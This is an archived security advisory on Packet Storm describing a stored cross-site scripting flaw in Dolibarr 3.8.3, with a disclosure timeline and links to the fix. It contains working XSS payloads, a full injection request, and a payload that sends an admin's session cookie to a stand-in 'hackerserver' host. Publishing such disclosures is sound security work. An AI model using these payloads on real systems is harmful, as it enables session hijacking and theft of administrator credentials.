exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Dolibarr 3.8.3 Cross Site Scripting

Dolibarr 3.8.3 Cross Site Scripting
Posted Jan 11, 2016
Authored by Mickael Dorigny | Site synetis.com

Dolibarr version 3.8.3 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | c17ecf80d34e2c761ee7e596af78927c7c4accbc17e3e897ce53a789bd3b1784

Dolibarr 3.8.3 Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: XSS on dolibarr 3.8.3
# Date: 03/01/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: http://www.dolibarr.org/
# Category: XSS
######################################################################

Dolibarr description :
======================================================================
Dolibarr ERP & CRM is a modern and easy to use web software to manage your business (contacts, invoices, orders, products, stocks, agenda, emailings, etc...).

It's opensource and free software designed for small companies, foundations and freelances.
You can install and use it as a standalone application, or online on a mutualized or dedicated server to use it from anywhere. Dolibarr is also available on ready to use Cloud services.

Vulnerability description :
======================================================================
A Stored XSS is available in the Dolibarr 3.8.3 core code. No module needs to be activated to exploit this XSS vulnerability because an attacker can use the user attributes management to do it.

This XSS can be exploited through a basic user account on the dolibarr installation. Impacted users are administrators and users that have right to check other user's attributes.

PoC n°1 : Stored XSS in user attributes:
====================================
Once a simple user is connected with his account, he can modifiy his attributes like Last name, First name, Mobile number, etc.. These informations can be reviewed by other users who have administration privileges.

Note that some basic protection are present just after form submitting. These protection doesn't allow attacker to use basic JavaScript tips like "<script>" tags or "onerror" JavaScript. But some other events or still allowed.

Using the <IMG> HTML tag and the "onmouseover" JavaScript event, we can force an admin to pass his mouse over the injected image. This event can be used to execute valid JavaScript instructions in the administrator browser or in browser of other users allowed to check user's attributes.

PoC :
As an authenticated user, fullfill "Last name", "First name", "email", "job" or "signature" input with this :
user1<img src=x onmouseover=alert(1)>

[REQUEST]
http://server/dolibarr/htdocs/user/card.php?id=2
[POSTDATA]
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="token"
3e01b40f4659396870a384c16213e400
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="action"
update
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="entity"
1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="lastname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="firstname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="job"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="gender"
man
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="login"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="password"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="admin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="superadmin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_phone"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="user_mobile"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_fax"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="email"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="signature"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="fk_user"
-1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="weeklyhours"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="save"
Save
-----------------------------7677991721297181448923571907--

Note that "First name" and "Last name" input are displayed in the "List of users" page, but they are truncated after 50 characters. This trunctation limits available XSS payloads. We can use the "signature" input to insert more JavaScript instructions in the same HTML form. Admin will then see this signature when they will click on a user in the "List of users" to see all his attributes.

Image insertion can target an existent or a non existent image. A little tips to have more chance to trap an admin is to upload a very big image (like 1920*1080) that will cover all the website page.

Once attributes are modified. Another user like an admin can check your attributes and then execute JavaScript instruction by passing his mouse over the injected image. Here is another Poc that will send the admin's cookie on a website controled by an attacker using a GET HTTP request. Inject this payload in the "signature" input :
<img src=x onmouseover=document.location="http://hackerserver?c="+document.cookie+"">

Using this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such as cookies.


Screenshots :
======================================================================
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-03.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-04.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-05.jpg

Solution:
======================================================================

The fix concerning this vulnerability is available on Dolibarr github repository : https://github.com/Dolibarr/dolibarr/issues/4341 / https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56

Additional resources :
======================================================================
- https://www.youtube.com/watch?v=p2rFWJOCJC8
- http://www.information-security.fr/en/xss-dolibarr-version-3-8-3/
- https://github.com/Dolibarr/dolibarr/issues/4341
- https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56


Report timeline :
======================================================================
2016-01-03 : Editor informed for vulnerability
2016-01-07 : Vulnerability is fixed
2016-01-11 : Advisory

Credits :
======================================================================

88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security

Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close